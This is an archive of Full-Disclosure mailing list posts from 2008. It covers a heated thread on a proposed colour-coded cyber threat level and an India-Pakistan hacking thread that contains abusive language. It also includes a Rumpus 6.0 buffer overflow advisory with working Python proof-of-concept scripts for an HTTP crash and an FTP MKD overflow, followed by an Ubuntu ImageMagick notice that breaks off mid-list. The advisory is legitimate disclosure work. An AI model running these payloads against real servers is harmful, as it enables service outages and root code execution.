Trusted Application

From mike.cartall at gmail.com Mon Dec 1 02:41:01 2008 From: mike.cartall at gmail.com (Mike C) Date: Mon, 1 Dec 2008 03:41:01 +0100 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> Message-ID: Yes, The project Chroma leads know of various efforts. But these are either vendor specific, or old and unstandardized. Project Chroma aims to be very active, and will look to interact with security vendors to implement the color codes in security products. -- MC Security Researcher Lead, Project Chroma http://sites.google.com/site/projectchromaproject/ On Sun, Nov 30, 2008 at 6:28 PM, Tomas L. Byrnes wrote: > The SANS Internet Storm Center has been doing this for ages. > > It has the advantage of being data driven, using the DShield reports as > a primary sensor mechanism. > > http://isc.sans.org/ > > > >>-----Original Message----- >>From: full-disclosure-bounces at lists.grok.org.uk > [mailto:full-disclosure- >>bounces at lists.grok.org.uk] On Behalf Of Mike C >>Sent: Saturday, November 29, 2008 9:35 PM >>To: Full Disclosure >>Subject: [Full-disclosure] Project Chroma: A color code for the state >>ofcyber security >> >>Hi, >> >>It is time to take an example from Homeland Security and define codes >>of color for cyber-warfare threat levels. I propose the following: >> >>Green level: There is negligible threat to online security. >>Yellow level : There is a minimal level of threat, and this must be >>monitored and contained. >>Orange level: This level of threat indicates there are parties who are >>actively engaging in cyber-warfare. Caution is required when online. >>Red level: This level indicates a full blown cyber-war. It indicates >>very high probability of all communications being intercepted. >> >>While homeland security's implementation does not seem to have a real >>world merit, such a threat level would certainly be very useful in the >>online security realm. Please disseminate this announcement of the >>project Chroma levels for online security. The immediate mission of >>the project is to be picked up by the antivirus and security tools >>vendors, so as to add the color codes to their products and provide >>users with a tangible measure of their online security. >> >>Current status: Threat level Yellow. >> >>-- >>MC >>Security Researcher >>Lead, Project Chroma. >> >>_______________________________________________ >>Full-Disclosure - We believe in it. >>Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>Hosted and sponsored by Secunia - http://secunia.com/ > From mike.cartall at gmail.com Mon Dec 1 02:38:50 2008 From: mike.cartall at gmail.com (Mike C) Date: Mon, 1 Dec 2008 03:38:50 +0100 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <4b6ee9310811301017w6a34be74t83c29f847f53381c@mail.gmail.com> Message-ID: On Sun, Nov 30, 2008 at 9:51 PM, vulcanius wrote: > So have you actually come up with a feasible metric for measuring the > current state of malicious/non-malicious traffic on the tubes vs the current Yes. I;m working with industry insiders and we have a set of tangible measurements ready. These will be a part of future Chroma announcements. > state of global tube defenses or is n3td3v's abstract world just rubbing off > on you and all you have is a list of colors and a crazy and horribly > unrealistic idea in your head? Such trolling is highly unwarranted. This kind of banter is not required on FD. I may have to take you up on this offline, and you dont want this. Ask some former FD posters. -- MC Security Researcher Lead, Project Chroma http://sites.google.com/site/projectchromaproject/ From vulcanius at gmail.com Mon Dec 1 03:19:16 2008 From: vulcanius at gmail.com (vulcanius) Date: Sun, 30 Nov 2008 22:19:16 -0500 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <4b6ee9310811301017w6a34be74t83c29f847f53381c@mail.gmail.com> Message-ID: What are you going to do? Give me a massage? I think I'd like that. But in all actuality, I can't wait to hear more about these industry insiders and your techniques for measuring the current level of security implemented across the tubes. That will be some feat. On Sun, Nov 30, 2008 at 9:38 PM, Mike C wrote: > On Sun, Nov 30, 2008 at 9:51 PM, vulcanius wrote: > > So have you actually come up with a feasible metric for measuring the > > current state of malicious/non-malicious traffic on the tubes vs the > current > > Yes. I;m working with industry insiders and we have a set of tangible > measurements ready. These will be a part of future Chroma > announcements. > > > state of global tube defenses or is n3td3v's abstract world just rubbing > off > > on you and all you have is a list of colors and a crazy and horribly > > unrealistic idea in your head? > > Such trolling is highly unwarranted. This kind of banter is not > required on FD. I may have to take you up on this offline, and you > dont want this. Ask some former FD posters. > > -- > MC > Security Researcher > Lead, Project Chroma > http://sites.google.com/site/projectchromaproject/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081130/5f1c09b3/attachment.html From vulcanius at gmail.com Mon Dec 1 03:21:06 2008 From: vulcanius at gmail.com (vulcanius) Date: Sun, 30 Nov 2008 22:21:06 -0500 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> Message-ID: By the way, I also noticed that the new site for your project has the current threat level as yellow. Is it safe to assume that you've already got your metric systems in place and running? On Sun, Nov 30, 2008 at 9:41 PM, Mike C wrote: > Yes, > > The project Chroma leads know of various efforts. But these are either > vendor specific, or old and unstandardized. Project Chroma aims to be > very active, and will look to interact with security vendors to > implement the color codes in security products. > > -- > MC > Security Researcher > Lead, Project Chroma > http://sites.google.com/site/projectchromaproject/ > > > On Sun, Nov 30, 2008 at 6:28 PM, Tomas L. Byrnes wrote: > > The SANS Internet Storm Center has been doing this for ages. > > > > It has the advantage of being data driven, using the DShield reports as > > a primary sensor mechanism. > > > > http://isc.sans.org/ > > > > > > > >>-----Original Message----- > >>From: full-disclosure-bounces at lists.grok.org.uk > > [mailto:full-disclosure- > >>bounces at lists.grok.org.uk] On Behalf Of Mike C > >>Sent: Saturday, November 29, 2008 9:35 PM > >>To: Full Disclosure > >>Subject: [Full-disclosure] Project Chroma: A color code for the state > >>ofcyber security > >> > >>Hi, > >> > >>It is time to take an example from Homeland Security and define codes > >>of color for cyber-warfare threat levels. I propose the following: > >> > >>Green level: There is negligible threat to online security. > >>Yellow level : There is a minimal level of threat, and this must be > >>monitored and contained. > >>Orange level: This level of threat indicates there are parties who are > >>actively engaging in cyber-warfare. Caution is required when online. > >>Red level: This level indicates a full blown cyber-war. It indicates > >>very high probability of all communications being intercepted. > >> > >>While homeland security's implementation does not seem to have a real > >>world merit, such a threat level would certainly be very useful in the > >>online security realm. Please disseminate this announcement of the > >>project Chroma levels for online security. The immediate mission of > >>the project is to be picked up by the antivirus and security tools > >>vendors, so as to add the color codes to their products and provide > >>users with a tangible measure of their online security. > >> > >>Current status: Threat level Yellow. > >> > >>-- > >>MC > >>Security Researcher > >>Lead, Project Chroma. > >> > >>_______________________________________________ > >>Full-Disclosure - We believe in it. > >>Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >>Hosted and sponsored by Secunia - http://secunia.com/ > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081130/fa0ccca4/attachment.html From rholgstad at gmail.com Mon Dec 1 03:36:39 2008 From: rholgstad at gmail.com (rholgstad) Date: Sun, 30 Nov 2008 21:36:39 -0600 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> Message-ID: <49335BC7.7010403@gmail.com> Do you actually want to go this route after seeing dhs being laughed at daily with their retarded color scheme? You realize that color schemes do nothing for real security and are just more policy BS right? Mike C wrote: > Yes, > > The project Chroma leads know of various efforts. But these are either > vendor specific, or old and unstandardized. Project Chroma aims to be > very active, and will look to interact with security vendors to > implement the color codes in security products. > > From raju at linux-delhi.org Mon Dec 1 03:43:54 2008 From: raju at linux-delhi.org (Raj Mathur) Date: Mon, 1 Dec 2008 09:13:54 +0530 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: References: <4b6ee9310811301017w6a34be74t83c29f847f53381c@mail.gmail.com> Message-ID: <200812010913.54479.raju@linux-delhi.org> On Monday 01 Dec 2008, vulcanius wrote: > [snip] is n3td3v's abstract world [more snip] Er, they're the same person! From tomb at byrneit.net Mon Dec 1 03:56:58 2008 From: tomb at byrneit.net (Tomas L. Byrnes) Date: Sun, 30 Nov 2008 19:56:58 -0800 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: <49335BC7.7010403@gmail.com> References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49335BC7.7010403@gmail.com> Message-ID: <70D072392E56884193E3D2DE09C097A9FA3E@pascal.zaphodb.org> Can we have patterns, so it's accessible? :-) My point was it's been done, in a data driven manner, so any utility that might be realized from such a scheme has already been provided. I make no representations regarding the utility of colors, but I do use the numeric value to bias how sensitive my SIM/SEMs are to IDS alerts. >-----Original Message----- >From: rholgstad [mailto:rholgstad at gmail.com] >Sent: Sunday, November 30, 2008 7:37 PM >To: Mike C >Cc: Tomas L. Byrnes; Full Disclosure >Subject: Re: [Full-disclosure] Project Chroma: A color code for the >state ofcyber security > >Do you actually want to go this route after seeing dhs being laughed at >daily with their retarded color scheme? You realize that color schemes >do nothing for real security and are just more policy BS right? > >Mike C wrote: >> Yes, >> >> The project Chroma leads know of various efforts. But these are either >> vendor specific, or old and unstandardized. Project Chroma aims to be >> very active, and will look to interact with security vendors to >> implement the color codes in security products. >> >> From taneja.security at gmail.com Mon Dec 1 04:48:40 2008 From: taneja.security at gmail.com (taneja.security at gmail.com) Date: Mon, 1 Dec 2008 10:18:40 +0530 Subject: [Full-disclosure] Indian allegations alarm Pakistan In-Reply-To: <197321660811300753p9b7de46i62ca541c08e3892c@mail.gmail.com> References: <4b6ee9310811291610r77106e6xf5fd86d4f5305414@mail.gmail.com> <200811300739.52113.raju@linux-delhi.org> <4b6ee9310811292141p416aaf4eiad9fe9d52d31b2cc@mail.gmail.com> <8a6b8e350811300412ub6205cdg39fd0773985ad93d@mail.gmail.com> <197321660811300753p9b7de46i62ca541c08e3892c@mail.gmail.com> Message-ID: Already started .... http://newsx.com/story/36421 On Sun, Nov 30, 2008 at 9:23 PM, Some Guy Posting To Full Disclosure < fd.leach at googlemail.com> wrote: > Aren't they just a bunch of kids trying to brag on IRC that they > hacked their 'enemy' country? Maybe they don't like them because of > propaganda is telling them Indians did the bombing. Or maybe they, > like most kids, they've no idea about current affairs and just want to > prove themselves good in their own little world. > > Like what happned with Russia vs. Georgia. > > On 11/30/08, James Matthews wrote: > > India was attacked the attackers came from Pakistan, I understand why > > Pakistan feels threatened however why would they attack Indian sites? > > > > On Sun, Nov 30, 2008 at 9:19 AM, Mike C wrote: > > > >> On Sun, Nov 30, 2008 at 11:11 AM, n3td3v wrote: > >> > On Sun, Nov 30, 2008 at 5:25 AM, Mike C > wrote: > >> >> > >> >> > >> >> On Sun, Nov 30, 2008 at 7:39 AM, Raj Mathur > >> wrote: > >> >>> > >> >>> On Sunday 30 Nov 2008, n3td3v wrote: > >> >>> > Indian-Pakistan war is about to kick off folks... > >> >>> > > >> >>> > http://news.bbc.co.uk/1/hi/world/south_asia/7757031.stm > >> >>> > >> >>> I know it's not going to happen, but can I request you once again > shut > >> >>> the fuck up about events that you have no clue about? > >> >>> > >> >>> At least try to keep your sensationalist retarded drivel to your own > >> >>> backyard. > >> >> > >> >> > >> >> Although a knee-jerk reaction, this post has some value. > >> >> > >> >> The tensions between the countries is on the rise, and the recent > >> >> blasts > >> in > >> >> Bangalore would increase the chances of war. BTW, does anyone have an > >> idea > >> >> on what kind of cyber-warfare is currently underway between the two > >> nations? > >> >> > >> >> -- > >> >> MC > >> > > >> > There was a report earlier in the week via pcworld.com, but I don't > >> > think its connected to this conflict, maybe just a coincidence: > >> > > >> > > >> > http://www.pcworld.com/businesscenter/article/154544/feuding_india_pakistani_hackers_deface_web_sites.html > >> > > >> > >> Thanks. I'm looking into this and will report on any further info. > >> > >> -- > >> MC > >> > >> _______________________________________________ > >> Full-Disclosure - We believe in it. > >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> Hosted and sponsored by Secunia - http://secunia.com/ > >> > > > > > > > > -- > > http://www.astorandblack.com/ > > > > http://www.jewelerslounge.com/liberty-coin-cufflinks > > > > > -- > I'm your best best friend. > > Usually I like it when you contradict me, it might help me learn. Just > don't be so angry. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081201/cd7cfb63/attachment.html From w3bd3vil at gmail.com Mon Dec 1 08:17:06 2008 From: w3bd3vil at gmail.com (webDEViL) Date: Mon, 1 Dec 2008 13:47:06 +0530 Subject: [Full-disclosure] Indian allegations alarm Pakistan In-Reply-To: <4932DC7F.9020505@pakcert.org> References: <4b6ee9310811291610r77106e6xf5fd86d4f5305414@mail.gmail.com> <200811300739.52113.raju@linux-delhi.org> <4b6ee9310811292141p416aaf4eiad9fe9d52d31b2cc@mail.gmail.com> <8a6b8e350811300412ub6205cdg39fd0773985ad93d@mail.gmail.com> <4932DC7F.9020505@pakcert.org> Message-ID: <8656dcd50812010017q56ff99ew872dcb8aa6f1181d@mail.gmail.com> Everyone knows that, but they are hiding it Thats what Kufr is all about! On Mon, Dec 1, 2008 at 12:03 AM, Qazi Ahmed wrote: > do you have any proof to back your theory? how about you feed your brain > for a change before drawing any conclusion > > India uncovers Hindu terror group that carried out bombings blamed on > Islamists > > http://www.belfasttelegraph.co.uk/news/world-news/india-uncovers-hindu-terror-group-that-carried-out-bombings-blamed-on-islamists-14076306.html > > Crisis May Shift India's Political Landscape > http://www.nytimes.com/2008/11/29/world/asia/29india.html > > > > James Matthews wrote: > > India was attacked the attackers came from Pakistan, I understand why > > Pakistan feels threatened however why would they attack Indian sites? > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081201/ba0a8691/attachment.html From akl at experian.dk Mon Dec 1 09:15:59 2008 From: akl at experian.dk (Anders Klixbull) Date: Mon, 1 Dec 2008 10:15:59 +0100 Subject: [Full-disclosure] Project Chroma: A color code for the stateofcyber security In-Reply-To: References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> Message-ID: <282134E75BDEB64E943CAF38C80BDD8AD324C0@PRO-EXCHANGESRV.experian.dk> Project chroma project? Welcome to the redundancy department of redundancy.. Mike c aka n3td3v shut the fuck up -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Mike C Sent: 1. december 2008 03:41 To: Tomas L. Byrnes Cc: Full Disclosure Subject: Re: [Full-disclosure] Project Chroma: A color code for the stateofcyber security Yes, The project Chroma leads know of various efforts. But these are either vendor specific, or old and unstandardized. Project Chroma aims to be very active, and will look to interact with security vendors to implement the color codes in security products. -- MC Security Researcher Lead, Project Chroma http://sites.google.com/site/projectchromaproject/ On Sun, Nov 30, 2008 at 6:28 PM, Tomas L. Byrnes wrote: > The SANS Internet Storm Center has been doing this for ages. > > It has the advantage of being data driven, using the DShield reports as > a primary sensor mechanism. > > http://isc.sans.org/ > > > >>-----Original Message----- >>From: full-disclosure-bounces at lists.grok.org.uk > [mailto:full-disclosure- >>bounces at lists.grok.org.uk] On Behalf Of Mike C >>Sent: Saturday, November 29, 2008 9:35 PM >>To: Full Disclosure >>Subject: [Full-disclosure] Project Chroma: A color code for the state >>ofcyber security >> >>Hi, >> >>It is time to take an example from Homeland Security and define codes >>of color for cyber-warfare threat levels. I propose the following: >> >>Green level: There is negligible threat to online security. >>Yellow level : There is a minimal level of threat, and this must be >>monitored and contained. >>Orange level: This level of threat indicates there are parties who are >>actively engaging in cyber-warfare. Caution is required when online. >>Red level: This level indicates a full blown cyber-war. It indicates >>very high probability of all communications being intercepted. >> >>While homeland security's implementation does not seem to have a real >>world merit, such a threat level would certainly be very useful in the >>online security realm. Please disseminate this announcement of the >>project Chroma levels for online security. The immediate mission of >>the project is to be picked up by the antivirus and security tools >>vendors, so as to add the color codes to their products and provide >>users with a tangible measure of their online security. >> >>Current status: Threat level Yellow. >> >>-- >>MC >>Security Researcher >>Lead, Project Chroma. >> >>_______________________________________________ >>Full-Disclosure - We believe in it. >>Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From mike.cartall at gmail.com Mon Dec 1 16:06:00 2008 From: mike.cartall at gmail.com (Mike C) Date: Mon, 1 Dec 2008 17:06:00 +0100 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> Message-ID: On Mon, Dec 1, 2008 at 4:21 AM, vulcanius wrote: > By the way, I also noticed that the new site for your project has the > current threat level as yellow. Is it safe to assume that you've already got > your metric systems in place and running? > Yes, We do have a working framework for color code generation. The inputs to this function include *exploits released in the past week - The severity of the exploit - The application it was in - The language - estimated users of the software *The previous week's color *Localized nature of exploits. We cannot comment more on this until it is refined and standardized. If you are (or know) an antivirus vendor, please contact me offline to move ahead. -- MC Security Researcher Lead, Project Chroma http://sites.google.com/site/projectchromaproject/ From mike.cartall at gmail.com Mon Dec 1 16:07:12 2008 From: mike.cartall at gmail.com (Mike C) Date: Mon, 1 Dec 2008 17:07:12 +0100 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: <49335BC7.7010403@gmail.com> References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49335BC7.7010403@gmail.com> Message-ID: On Mon, Dec 1, 2008 at 4:36 AM, rholgstad wrote: > Do you actually want to go this route after seeing dhs being laughed at > daily with their retarded color scheme? You realize that color schemes do > nothing for real security and are just more policy BS right? > A well implemented system will go a long way in helping security. The keyword, of course, is _well implemented_, which is our primary aim. -- MC Security Researcher Lead, Project Chroma http://sites.google.com/site/projectchromaproject/ From mike.cartall at gmail.com Mon Dec 1 16:09:07 2008 From: mike.cartall at gmail.com (Mike C) Date: Mon, 1 Dec 2008 17:09:07 +0100 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: <200812010913.54479.raju@linux-delhi.org> References: <4b6ee9310811301017w6a34be74t83c29f847f53381c@mail.gmail.com> <200812010913.54479.raju@linux-delhi.org> Message-ID: On Mon, Dec 1, 2008 at 4:43 AM, Raj Mathur wrote: > On Monday 01 Dec 2008, vulcanius wrote: >> [snip] is n3td3v's abstract world [more snip] > > Er, they're the same person! > And you are Gordon Brown. Really. Believe me, even though I'm not from linux-delhi.org -- MC Security Researcher Lead, Project Chroma http://sites.google.com/site/projectchromaproject/ From rholgstad at gmail.com Mon Dec 1 16:17:23 2008 From: rholgstad at gmail.com (rholgstad) Date: Mon, 01 Dec 2008 10:17:23 -0600 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49335BC7.7010403@gmail.com> Message-ID: <49340E13.10702@gmail.com> Please explain how your colored coded system will actually help people Mike C wrote: > On Mon, Dec 1, 2008 at 4:36 AM, rholgstad wrote: > >> Do you actually want to go this route after seeing dhs being laughed at >> daily with their retarded color scheme? You realize that color schemes do >> nothing for real security and are just more policy BS right? >> >> > > A well implemented system will go a long way in helping security. The > keyword, of course, is _well implemented_, which is our primary aim. > > From rholgstad at gmail.com Mon Dec 1 16:27:29 2008 From: rholgstad at gmail.com (rholgstad) Date: Mon, 01 Dec 2008 10:27:29 -0600 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> Message-ID: <49341071.4050608@gmail.com> and how does making a color based on these inputs protect people? Mike C wrote: > On Mon, Dec 1, 2008 at 4:21 AM, vulcanius wrote: > >> By the way, I also noticed that the new site for your project has the >> current threat level as yellow. Is it safe to assume that you've already got >> your metric systems in place and running? >> >> > > Yes, > > We do have a working framework for color code generation. The inputs > to this function include > > *exploits released in the past week > - The severity of the exploit > - The application it was in > - The language > - estimated users of the software > > *The previous week's color > > *Localized nature of exploits. > > We cannot comment more on this until it is refined and standardized. > If you are (or know) an antivirus vendor, please contact me offline to > move ahead. > > From namn at bluemoon.com.vn Mon Dec 1 16:56:19 2008 From: namn at bluemoon.com.vn (Nam Nguyen) Date: Mon, 1 Dec 2008 23:56:19 +0700 Subject: [Full-disclosure] [BMSA 2008-09] Two buffer overflow vulnerabilities in Rumpus v6.0 Message-ID: <20081201235619.4633aff7.namn@bluemoon.com.vn> BLUE MOON SECURITY ADVISORY 2008-09 =================================== :Title: Two buffer overflows in Maxum Rumpus :Severity: Critical :Reporter: Blue Moon Consulting :Products: Maxum Rumpus v6.0 :Fixed in: 6.0.1 Description ----------- Rumpus turns any Mac into a file transfer server. Rumpus v6.0 contains two buffer overflow vulnerabilities in its HTTP and FTP modules. The first allows an unauthenticated user to crash Rumpus. The later may result in arbitrary code execution under superuser privilege. The overflow in HTTP component is caused by the lack of boundary check when parsing for HTTP action verb (GET, POST, PUT, etc.). If the verb is exactly 2908-byte long, the server runs into a segmentation fault and crashes. A manual restart is required. It has been observed that this problem occurs at other verb lengths too. The vulnerability is rated at moderate severity for the lost of service. The overflow in FTP component is also caused by the lack of length check when parsing FTP commands that take argument such as ``MKD``, ``XMKD``, ``RMD`` and so on. The overflow occurs when the argument is ``strcpy`` to an internal buffer. This buffer is 1024-byte long. When the passed-in argument is longer than 1046 bytes, the instruction pointer will be overwritten. This allows a successful attack to run arbitrary code under the privilege of a superuser (root) by default. Though authorization is required to exploit this security bug, the vulnerability is rated at critical severity because the FTP daemon could be allowing anonymous access. Workaround ---------- There is no workaround the first bug. Disable ANONYMOUS and only allow trusted users to use FTP. Fix --- Maxum has released Rumpus v6.0.1 which addressed these bugs. Disclosure ---------- Blue Moon Consulting adapts `RFPolicy v2.0 `_ in notifying vendors. :Initial vendor contact: November 28, 2008: Initial contact sent to support at maxum.com :Vendor response: November 28, 2008: John requested further communications to be sent to the same address. :Further communication: November 28, 2008: Technical details and request for regular update of a patch sent to the vendor. November 29, 2008: Vendor thanked for the bug report and planned to release v6.0.1 on Monday, December 01. December 01, 2008: Vendor released 6.0.1 and posted release note at http://www.maxum.com/Rumpus/News601.html. :Public disclosure: December 01, 2008 :Exploit code: For the vulnerability in HTTP component:: from socket import socket, AF_INET, SOCK_STREAM host = "192.168.1.12" port = 80 s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) s.send('z' * 2908 + '\n\n') s.recv(1024) s.close() For the vulnerability in FTP component:: from socket import socket, AF_INET, SOCK_STREAM host = "192.168.1.12" port = 21 user = "regular" pass_ = "training" commands = [ 'user regular\n', 'pass training\n', 'mkd ' + 'z' * 1046 + 'abcd\n' ] s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) s.recv(1024) for line in commands: s.send(line) s.recv(1024) s.close() Disclaimer ---------- The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 195 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081201/7e89da59/attachment.bin From marc.deslauriers at canonical.com Mon Dec 1 17:11:08 2008 From: marc.deslauriers at canonical.com (Marc Deslauriers) Date: Mon, 01 Dec 2008 12:11:08 -0500 Subject: [Full-disclosure] [USN-681-1] ImageMagick vulnerability Message-ID: <1228151468.9860.3.camel@mdlinux.technorage.com> =========================================================== Ubuntu Security Notice USN-681-1 December 01, 2008 imagemagick vulnerability CVE-2008-1096 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: imagemagick 6:6.2.4.5-0.6ubuntu0.8 Ubuntu 7.10: imagemagick 7:6.2.4.5.dfsg1-2ubuntu1.1 After a standard system upgrade you need to restart any applications that use ImageMagick, such as OpenOffice.org and Inkscape, to effect the necessary changes. Details follow: It was discovered that ImageMagick did not correctly handle certain malformed XCF images. If a user were tricked into opening a specially crafted image with an application that uses ImageMagick, an attacker could cause a denial of service and possibly execute arbitrary code with the user's privileges. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5-0.6ubuntu0.8.diff.gz Size/MD5: 42513 e496b5beeaca8ffaf73792efc552bb75 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5-0.6ubuntu0.8.dsc Size/MD5: 922 18af22ef2d20f02bc71a2b4d525101ba http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5.orig.tar.gz Size/MD5: 6085147 8d790a280f355489d0cfb6d36ce6751f amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5-0.6ubuntu0.8_amd64.deb Size/MD5: 1616784 e140ab1826153433380bf0e087401ce5 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9-dev_6.2.4.5-0.6ubuntu0.8_amd64.deb Size/MD5: 249840 b52af42a36a2e6aeded4f0e1bdc3c7c5 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9c2a_6.2.4.5-0.6ubuntu0.8_amd64.deb Size/MD5: 170776 f99388b02f4989d6b3d98886ecef69e3 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9-dev_6.2.4.5-0.6ubuntu0.8_amd64.deb Size/MD5: 1705392 9de94091eb1cf8a31b28516c1444cd94 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9_6.2.4.5-0.6ubuntu0.8_amd64.deb Size/MD5: 1349700 a0712e9eefe0c2d2e8e59a5920dd8821 http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.2.4.5-0.6ubuntu0.8_amd64.deb Size/MD5: 172600 affa28f951b642bf64cdfdb4153b193d i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5-0.6ubuntu0.8_i386.deb Size/MD5: 1615502 34f7ed99bbdaed2247321395623e9e6c http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9-dev_6.2.4.5-0.6ubuntu0.8_i386.deb Size/MD5: 227826 8308c202b96c1960fd352b4a011ba290 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9c2a_6.2.4.5-0.6ubuntu0.8_i386.deb Size/MD5: 169702 1380b74079bf68498434229be87ba197 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9-dev_6.2.4.5-0.6ubuntu0.8_i386.deb Size/MD5: 1558588 edfc14ac9018b3e6f4e303e83af74637 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9_6.2.4.5-0.6ubuntu0.8_i386.deb Size/MD5: 1250130 72e586dfbe9bcb0602a37eadcce574bc http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.2.4.5-0.6ubuntu0.8_i386.deb Size/MD5: 167964 2bc1e8c08d403321df20868c6a646bfd powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5-0.6ubuntu0.8_powerpc.deb Size/MD5: 1620342 50b2274fd75d9f8fe2c78d9bb9aad4be http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9-dev_6.2.4.5-0.6ubuntu0.8_powerpc.deb Size/MD5: 252100 d0073b909c9073b4108272cf58724bb2 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9c2a_6.2.4.5-0.6ubuntu0.8_powerpc.deb Size/MD5: 163178 228bf2af722438ff3584bb85075cf956 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9-dev_6.2.4.5-0.6ubuntu0.8_powerpc.deb Size/MD5: 1909532 b7d8d5fbdac11cc2bb8df9faffb6592d http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9_6.2.4.5-0.6ubuntu0.8_powerpc.deb Size/MD5: 1285690 d1a834cc502a2ae7a8c0a805da80fd83 http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.2.4.5-0.6ubuntu0.8_powerpc.deb Size/MD5: 166968 8c568ce0d4d7ab9f46e681f0f5c80b8f sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5-0.6ubuntu0.8_sparc.deb Size/MD5: 1616114 80af67cc6405b2f9744a66f62ab7e35b http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9-dev_6.2.4.5-0.6ubuntu0.8_sparc.deb Size/MD5: 229934 8069e7cc0272505907654484c0083400 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9c2a_6.2.4.5-0.6ubuntu0.8_sparc.deb Size/MD5: 168044 bec93b0a4e03bf308c0e5e73649c0267 